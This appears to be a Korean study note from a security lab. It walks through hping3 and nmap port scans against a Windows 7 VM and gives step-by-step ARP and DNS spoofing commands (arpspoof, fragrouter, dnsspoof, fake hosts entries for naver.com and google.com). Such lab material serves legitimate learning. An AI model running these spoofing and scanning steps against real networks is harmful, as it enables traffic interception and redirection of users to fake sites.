Red_Seek :: 네트워크 해킹 및 보안 - 포트스캔, DNS

0. 실습 환경

가. kali

- IP : 192.168.221.130

- MAC :  00-0c-29-9a-be-c1

나. VM_win7

- IP : 192.168.221.135

- MAC :  00-0C-29-C7-7A-39

 

1. TCP, UDP 관련 공격

가. ack 스톰

나. 세션 하이재킹

다. syn 플루딩(DoS 공격)

라. flooding(tcp, udp)

마. port scan

 

2. TCP, UDP 가짜 세그먼트 만들기 : 포트 스캔

가. 참조 : c:\windows\system32\drivers\etc\services

나. 실습

1) victim : win7(VM), attacker : kali

가) UDP

① # hping3 -2 [victim_ip] -p 53

② # hping3 -2 [victim_ip] -p 139

 

③ 와이어샤크 확인

- 검정색으로 표시된 것은 ICMP 오류 메시지이다.

 

④ 해당 포트가 서비스 중이 아니라는 ICMP 패킷으로 오류 메시지가 온다.

- type 3, code 3 의 오류 메시지

 

⑤ # hping3 -2 [victim_ip] -p 137   [netbios 에서 이미 서비스중]

- 이미 서비스 중이기 때문에 서비스 중이 아니라는 오류 응답(type 3, code 3)이 오지 않는다.

 

나) TCP

① # hping3 [victim_ip] -p 80 -S

② # hping3 [victim_ip] -p 139 -S

 

③ 와이어샤크 확인

 

④ 80포트에 SYN 패킷을 보내면 서비스 중이 아니므로 종료 시키는 RST 패킷으로 응답이 온다.

⑤ 139포트는 서비스 중이기 때문에 SYN+ACK가 오지만 자신의 서비스가 아니기 때문에 RST 을 더 보내 종료 시킨다.

 

2) NMAP

가) -sS : 스텔스, 3-way 에서 마지막 ack를 보내지 않아서 로그가 안남는다.

나) -sN : flag에 아무것도 넣지 않아(null)서 RST 응답을 받고 판단

다) -sF : FIN 패킷만 보낸다.

라) -sX : flag를 여러개 같이 보낸다.

마) -sI : Idle, 좀비를 시켜서 해당 좀비의 ID를 모니터링해서 서비스가 열려있는지가 확인

(정확하기에는 좀비가 다른 통신이 없어야 정확함)

바) 대상이 정해져있지않는 경우 -iR 옵션(랜덤타겟)으로 사용

사) 스캔

- # nmap -sn 192.168.221.0/24

- # nmap -sS [vintim_ip]    =>    TCP

- # nmap -sU [vintim_ip]    =>    UDP

 

3. DoS(Denial of Service) : 서비스 거부 공격

 

4. DDoS : DoS에서 한단계 업그레이드 된 공격, 여러 대의 좀비 PC를 이용하여 공격하는 것이 특징이다.

 

5. DRDoS

 

6. MITM(Man In The Middle)

가. 중간자 공격

나. Sniffing : 도청, 훔쳐보기

다. Spoofing : 속이기

1) ARP spoofing

2) IP spoofing

가) Land attack, tcp syn flooding, smurf, icmp redirect

3) DNS spoofing

라. DNS MITM

1) DNS(도메인 이름 서비스)

가) PC -> DNS 서버 : 재귀 쿼리

나) DNS 서버 -> PC : 반복 쿼리

다) 패킷 확인

① cmd> nslookup www.naver.com        =>    명령어 입력 

 

② 패킷 확인 

 

③ Query

- 53번 포트

- 요청이 여러개이기 때문에 Transaction ID 부여

- 맨 아래 내가 요청한 도메인 이름이 보인다

 

④ Response 

- 맨 아래 answers 부분에 내가 요청한 것의 응답이 들어있다.

 

2) DNS spoofing

가) 사용툴 : dnsspoof, arpspoof, fragrouter

- 공격자(kali)

# arpspoof -t [victim_ip] [gateway]

# fragrouter -B1

# cd /tmp

# cat > hosts       => 내용 작성, 가짜 사이트 2개

192.168.1.6            www.naver.com 

192.168.221.130      www.google.com

[Ctrl + d]

# ls hosts

# cat hosts

# dnsspoof -f /tmp/hosts

- victim(VMwin7)

# dns 서버 주소를 외부로 한다. (168.128.63.1)

# 웹사이트 접속

 

나) 공격

① kali에서 가짜 사이트 만들기

# service apache2 start 

# ps -ef | grep apache

② arp 스푸핑과 포워딩

# arpspoof -t 192.168.221.135 192.168.221.2

# fragrouter -B1 

 

③ dns 스푸핑

# dnsspoof -f /tmp/hosts

- 처음에 실행하면 포트를 열고 기다린다.

 

- victim 에서 웹사이트로 naver, google에 접속 시도 

- 위에서 작성한 가짜 사이트로 접속된다. 

- 공격자가 dns 응답을 대신 해주고 있다.

 

④ 패킷 확인 

- 소스 주소는 외부 정상적인 dns 주소로 보이지만 MAC 주소를 보면 공격자의 주소이다.